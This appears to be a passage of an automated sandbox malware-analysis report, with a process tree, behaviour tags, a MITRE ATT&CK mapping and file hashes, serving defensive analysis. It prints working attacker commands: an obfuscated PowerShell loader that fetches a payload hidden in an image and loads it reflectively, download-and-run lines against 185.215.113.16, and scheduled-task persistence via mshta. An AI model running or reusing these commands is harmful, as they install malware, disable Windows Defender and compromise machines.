g@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@FM@ZgBn@Go@ZwBq@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe"C:\Users\Admin\AppData\Local\Temp\1072400101\bb53b2706a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:3208 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6LQBvmarfz5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2168
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\trFyeZ4RT.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916 -
C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE"C:\Users\Admin\AppData\Local\TempVJ17OSISOBM1WNZMOS5H20ODWCG9SWHL.EXE"9⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1072401021\am_no.cmd" any_word7⤵
- System Location Discovery: System Language Discovery
PID:3180 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:3340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Lnzbxma67Tp" /tr "mshta \"C:\Temp\zRGpbMfKW.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4160
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\zRGpbMfKW.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2172 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;9⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1736
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe"C:\Users\Admin\AppData\Local\Temp\1072402001\Fe36XBk.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe"C:\Users\Admin\AppData\Local\Temp\1072411001\dda6de0d95.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3640
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NkM0ODlEQUItRDM3NC00NzVDLTlDOTctOEQ0Q0YxQUZFNjZFfSIgdXNlcmlkPSJ7MTZGREIyMTYtQzZBNy00RjU0LTk5QUQtRTFBQkNEMEY4Rjg1fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7ODY2MzMxMkMtODNCNS00NjE2LThGOTItMEFEMkNFQkU1QjdBfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDM0MjA1NzI1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1708
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3340
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:976
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1.2MB
MD512c676ce651cc131804839aefecab260
SHA1e6bbacc97bb925a2eecbfea4d2aaa191ef08ac00
SHA2560daf04d613cc238c00809eaedbd92155fd4a9d20cc9b3a81207ae582df4d6afe
SHA5122acabffd10d2cd8ac7451cdfe6f0b4f1b3e5e17f033ef3029cd2f7978d040deb1ad70144a5b099f8db0c4547221dd81590d0c3712c3a3e8cf8d806dab97f7806
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
14B
MD5ef48733031b712ca7027624fff3ab208
SHA1da4f3812e6afc4b90d2185f4709dfbb6b47714fa
SHA256c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99
SHA512ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029
-
Filesize
126KB
MD52f396541c1d69290fe92fc5074796a69
SHA1efb9cf0760a11f8bd181cde7142d65c390d1828a
SHA2568f2a4735f15ae53c78f4f5e988db0a5b6ab5c40d7f5dbb9628ae977a4f8e55b8
SHA51269f3283e064a9fbb95b7270178e5d41f18ccb3a3531774b060489921e2326f39880bad7d0fad3a1c39abc5371d9a5a5c02147ab5eff1860df9354f0571260d64
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
152B
MD575fc6fd984687a3b60604f8385d2d3ee
SHA147ca2cd71dfbddaf9fbdec9f9b4940d465bd40e9
SHA2567f3c92d21167647ec0b45c9ed1163abd9a8d9199bc1d715edd58440ea1adc6ab
SHA512cdeaa85deccb8ade6e361b47ee47a2fcf687f91e6105d2b250d6239eaefaaf40ce1f612dfcff132ade8bc497f9527429757ebf477092c8e10b16c6426971214a
-
Filesize
152B
MD5d93f6e4c57710d309e3397e058ad78f3
SHA10fbea33aed97992a22327797ad102e419b37e9cc
SHA2563439987ffec3d9feb7a8943beb481ee0259199882b66b863fe70c9f7ecbc21c3
SHA5122449fb3826e493fec6304cf48ccab992653be05799467c85f4327feb6446c4109057d08f57fd57a3c342ace8e3c74c887ce9a21112c25a8efbff7fe0ad5c757f
-
Filesize
6KB
MD5c2cae108488044950f84bd30465e9607
SHA196f3898da34c965323d093b557cd54c5bf56ed8a
SHA256b7c5bd3f1003ea2c6d22003f8f85050735cfb4ea8fe9148c3385fbc812422548
SHA512e93ed4391ee6b79bbdb4dd02f942278b0d6b9bf92daf9e56a1b41e760a4fbb0e12c791ff9ad827d4a199417fb488ee5943b49db8dd0f76fedd8a361239735cb2
-
Filesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
Filesize
53KB
MD53337d66209faa998d52d781d0ff2d804
SHA16594b85a70f998f79f43cdf1ca56137997534156
SHA2569b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA5128bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f
-
Filesize
19KB
MD59aacc03c8d1aef1f55a5b6a61312e2cc
SHA116a64b6682f611fea77bb0502603df3cd011d76e
SHA256a7b7592f16da4aa14a13869ca0bea858d133c3fae107518c2906877dea3fa64b
SHA512e284065925b9a3b521d9a4175d27084617ee7e0082b812ca4df299a6772e25f349df454a848dc2b02e4998400f2cd6baa5c60c918d4e7a2ea2f942585f081f64
-
Filesize
20KB
MD572437413a6bab0b952520e4850ccb0d6
SHA10530f3a07d12956b6fb0aa640a3ed2072380503b
SHA25671e9ff151b461ed6365c487077bcaa078ab5597bb8a5899624b930bbee8c9748
SHA512f69ef094ae5d330a2fb6ecb4d1338efc0594e37d4c51b35b90eb44d51001532f83ffd2c3d8cb131332974ab82467dd75a1c0dedb53df8c52bfb0f5042d28b2e1
-
Filesize
16KB
MD5814252d15e71bb5b71521da89506a13e
SHA1aa578d3f6f302298a35b2bbd5dd5204fba7eaeb7
SHA256b93398610e457e5fa3e6066eaf594573eedf7a5a90ba38eb50b065f6891e24c4
SHA5127533d72b780e55581494c641cb70332a4e5aed5e0d5e3ccfa6a866131ae8d15626fbf79d7ca3c46c0beea40fd07bd5720d1b7dbd80a721ec250481c9aa1d05c6
-
Filesize
16KB
MD58f108e274182cc2e4d04dd1b4cc7b62a
SHA1ba63c32a671a32e599927e12c968dee54326aa60
SHA2563a1bcf1a20e14c40de6ec98365985095ab2b87d119cf9021e3e1ac9ad81c63a4
SHA512506a8a3037e72e981c56fe9017344ed0d07b5389c8b3ee03b2b883c837c61d0458e1b8976ccc226b9aad526981fc42f91acfffc3b959f5675228c9336237c18d
-
Filesize
16KB
MD5d0a6611bd43cd4394e9340a81c8ec589
SHA141d5c5ba667e8e9005d98081b9893bb0be84a757
SHA2560ae7f6bac5406b37146773ecad3848d9f634baa44462c1a92235bce89720a118
SHA512b69894b49658a0b0472510313708a001b7d2242ec06ff43a10fb818823eb2a933225f4640f4b6d2e577c17e328593b3c60e8488bd8ecc680b4d1c91185617d1d
-
Filesize
16KB
MD528429b7349755c17d2d231250724277e
SHA120b66d0a0246878860b2461e7485e1e72d695930
SHA256de96b3d155ad8d4333e9365c1eee37105595c50148c126c6a2a2f7c58157c26b
SHA5122d8dc160306590dbdb9d9f365b0306c38b8678be27a5d031e2f5db0730b06271c9bfc00675cb7729ee13ecf99914a248973aa05f2258590e305e14a84557392b
-
Filesize
2.0MB
MD55b0a7fc38aabac34a16d0b7739a5920f
SHA1247eca5db3c002ff17728a0ec84b8df3931b0924
SHA25631fa3a682cac17998ecd8a575f58916e5d6fa26d5eec61f71af4898f5849717e
SHA5120bb20421a6fe1a1ed30f1d0cd3275ca1ad229d77fe76a0e14c03a986c05a592364ef9ea5660f01e2b136ba90874985f5c9731ad6218648e56d4aba32c70e5abe
-
Filesize
2.6MB
MD58347d9850212e4c873066599739fddaf
SHA1275b7bd3dcdee6c5d4ea9784e1029bc3ef64d0b8
SHA2561966533f96c47dd8f25757658a069429e68a370c2c5af62065f8d90acd5353dc
SHA5123eb06d7f48b99b14105cb739aaa651c22fcdb58338cde6b6e555249fa48a731f16d70801577a279817bf740dbf58a8750510165e96f448d88edfffec2303eae2
-
Filesize
880KB
MD51c611166768934709414e86420907d9e
SHA16f2d29019332f417f2c36e09adc68dade71fa71a
